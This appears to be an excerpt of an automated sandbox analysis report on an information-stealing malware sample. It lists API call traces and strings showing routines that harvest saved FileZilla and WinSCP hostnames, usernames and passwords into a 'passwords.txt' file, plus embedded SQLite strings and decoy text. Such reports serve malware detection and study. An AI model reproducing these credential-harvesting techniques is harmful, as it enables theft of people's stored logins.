                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$lstrlen$lstrcpy$mallocmemsetstrncpystrtok_s
                                                                                                                                                                                                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $O{BN{BK{B$Password: $Soft: FileZilla$passwords.txt
                                                                                                                                                                                                                                        • API String ID: 368316605-4044742749
                                                                                                                                                                                                                                        • Opcode ID: 2504489c83ee430403c3c6d527c3b242dbb672e54f4aa7bda098665578810373
                                                                                                                                                                                                                                        • Instruction ID: 003d06b88ee209d3646e7d5b0c8682ef30a99e174e8e8da48fb9cda7d86fbdc0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2504489c83ee430403c3c6d527c3b242dbb672e54f4aa7bda098665578810373
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5B1B575904219AACB04EBA1DC56BEEBB78BF19304F50046EF501B3192DF786A48CB69
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409579
                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409582
                                                                                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409591
                                                                                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 0040959B
                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00420CA3,00000000,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF), ref: 004095AE
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004095BB
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004095C2
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,01461FC8,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004095D3
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(-00000010,01461E48,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004095EE
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,0145F650), ref: 00409604
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 00409617
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427C54), ref: 00409626
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 00409639
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427C58), ref: 00409648
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,0145F5C0), ref: 00409658
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,-00000010), ref: 00409663
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427C5C), ref: 00409672
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(-000000FE,014615F8,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409683
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000014,01461538,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409694
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,0145F5B0), ref: 004096AA
                                                                                                                                                                                                                                          • Part of subcall function 00409330: memset.MSVCRT ref: 00409359
                                                                                                                                                                                                                                          • Part of subcall function 00409330: lstrlen.KERNEL32(004096B6,00000001,?,00001FA0,00000000,00000000,?,004096B6), ref: 00409376
                                                                                                                                                                                                                                          • Part of subcall function 00409330: CryptStringToBinaryA.CRYPT32(004096B6,00000000,?,004096B6), ref: 0040937E
                                                                                                                                                                                                                                          • Part of subcall function 00409330: memcpy.MSVCRT ref: 004093F1
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 004096BE
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427C60), ref: 004096CD
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(-000000FE,01461538,?,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004096DE
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000014,0145F590,?,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004096EF
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,014620E8), ref: 00409705
                                                                                                                                                                                                                                          • Part of subcall function 00409330: lstrcat.KERNEL32(00427AA7,00427AAB), ref: 0040942D
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 00409719
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427C64), ref: 00409728
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427C68), ref: 00409737
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(-00000002,01461FC8,?,?,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409748
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(000000FF,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 0040975C
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 004097B1
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004097BA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$Filelstrcpy$lstrlen$HeapPointermemset$AllocBinaryCloseCryptHandleProcessReadSizeStringmemcpy
                                                                                                                                                                                                                                        • String ID: passwords.txt
                                                                                                                                                                                                                                        • API String ID: 2388354673-347816968
                                                                                                                                                                                                                                        • Opcode ID: 6eeb3c14f299bfd014cc7363a9c42ae89670ef8ad7f31e1185115eb00b0f37ef
                                                                                                                                                                                                                                        • Instruction ID: 0c1f35d45bd3c2b6c9383514b9817522ff8a3a891fab0831307e9c008aa627d4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6eeb3c14f299bfd014cc7363a9c42ae89670ef8ad7f31e1185115eb00b0f37ef
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78B1C375900205EBDB10EBA0DC59FEE7BB9BF1A304F540519FA02A3291DF785A48CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,Soft: WinSCP), ref: 0040C74C
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,Host: ), ref: 0040C75B
                                                                                                                                                                                                                                        • RegGetValueA.ADVAPI32(000000FF,?,HostName,00000002,00000000,?,?), ref: 0040C77F
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,?), ref: 0040C78C
                                                                                                                                                                                                                                        • RegGetValueA.ADVAPI32(000000FF,?,PortNumber,0000FFFF,00000000,?,?), ref: 0040C7B7
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,00000000), ref: 0040C7DD
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,:22), ref: 0040C7F9
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,00427E4C), ref: 0040C808
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,Login: ), ref: 0040C817
                                                                                                                                                                                                                                        • RegGetValueA.ADVAPI32(000000FF,?,UserName,00000002,00000000,?,?), ref: 0040C83B
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,?), ref: 0040C848
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,00427E64), ref: 0040C857
                                                                                                                                                                                                                                        • RegGetValueA.ADVAPI32(000000FF,?,Password,00000002,00000000,?,?), ref: 0040C87B
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,Password: ), ref: 0040C886
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00427B3E), ref: 0040C898
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,00000000), ref: 0040C8D3
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,00427E80), ref: 0040C8ED
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,00427E84), ref: 0040C8FC
                                                                                                                                                                                                                                        • RegEnumKeyExA.ADVAPI32(000000FF,00000001,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C921
                                                                                                                                                                                                                                          • Part of subcall function 00411C10: wsprintfA.USER32 ref: 00411C2B
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040C932
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040C940
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00421610), ref: 0040C958
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040C9AB
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$Value$memset$Enumlstrlenwsprintf
                                                                                                                                                                                                                                        • String ID: Host: $HostName$Login: $Password$Password: $PortNumber$Soft: WinSCP$UserName$passwords.txt
                                                                                                                                                                                                                                        • API String ID: 2902345061-4040920679
                                                                                                                                                                                                                                        • Opcode ID: 4cf30f45a6693c620ec2a003ab5cbf899c03944fa43ca4557fde33857f9d223c
                                                                                                                                                                                                                                        • Instruction ID: 15f759088607e9964790177d35be8adeac096382de0593ff92e4df6e6086aa5c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cf30f45a6693c620ec2a003ab5cbf899c03944fa43ca4557fde33857f9d223c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17717FB1D0021AABCB04DBE4DC95EFFB779EB48304F50455AF615A3180D6785E488B74
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ,%s$CREATE TABLE x(_shape$_node
                                                                                                                                                                                                                                        • API String ID: 0-1242591684
                                                                                                                                                                                                                                        • Opcode ID: c771822f666aee86e0508096e670a8d81ec99076aa20940af82102bf3fa277b4
                                                                                                                                                                                                                                        • Instruction ID: 079ea6fdc7c72845027d77250a95b625b25c8569b231e15b8344e9b7672a3ffd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c771822f666aee86e0508096e670a8d81ec99076aa20940af82102bf3fa277b4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52C11476A00341DBD7129F74EC89B97BBF4BF44344F188128E98A87392DB36E415CB62
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %.16g$%.18s-%s$%c%u$%lld$%s(%d)$(blob)$,%s%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                                                                                                                                        • API String ID: 0-900822179
                                                                                                                                                                                                                                        • Opcode ID: cd9d341a8164b5ebb1497b995268acb807072c30ffb34fc3fa5d5112c5199674
                                                                                                                                                                                                                                        • Instruction ID: ff4d1f8e2a4473b73c5af7e918a2e2315c660bda2c5a9b56348e421e77089424
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd9d341a8164b5ebb1497b995268acb807072c30ffb34fc3fa5d5112c5199674
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E891F674A183059FDB04EF54C881B6B77E5BF81304FDD8849E8C99B653E73AE8068B91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                                                                                                        • API String ID: 0-449611708
                                                                                                                                                                                                                                        • Opcode ID: 85c2aca7498f827e5a586ddaae48b109a8ac3e545ca955c0bc211be1aa3c5a8c
                                                                                                                                                                                                                                        • Instruction ID: ad995360abd6b65b7ad12e98ec41c0b36e7754aa0b374e3e7c0cdbcf857fb10d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85c2aca7498f827e5a586ddaae48b109a8ac3e545ca955c0bc211be1aa3c5a8c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A517A75F0031167F611BA65FC85F9B3AA8AF01759F0C4034FD8AA6282E765E706C2A6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                                        • API String ID: 0-2933911573
                                                                                                                                                                                                                                        • Opcode ID: e77c0a81798337cfa6c89dcd7c2b5de8acabfbfa7b2ef558bc087eac3aed2744
                                                                                                                                                                                                                                        • Instruction ID: 51db34637320a18b002cd19e7993674b2594783b62c4615dd9c69b65585012cf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e77c0a81798337cfa6c89dcd7c2b5de8acabfbfa7b2ef558bc087eac3aed2744
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68A19E75A003515BE7029B74EC42BAA7BD99F42311F5C4165EC8D9B6C2E62BA10FC3B2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 0040235B
                                                                                                                                                                                                                                        • Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 0040236F
                                                                                                                                                                                                                                        • At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402316
                                                                                                                                                                                                                                        • Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 0040230C
                                                                                                                                                                                                                                        • Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 00402333
                                                                                                                                                                                                                                        • The Near-Earth Object Confirmation Page (NEOCP) is a web service listing recently-submitted observations of objects that may be near-Earth objects (NEOs)., xrefs: 00402302
                                                                                                                                                                                                                                        • At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402345
                                                                                                                                                                                                                                        • At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402379
                                                                                                                                                                                                                                        • At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402365
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: strlen$AllocLocal
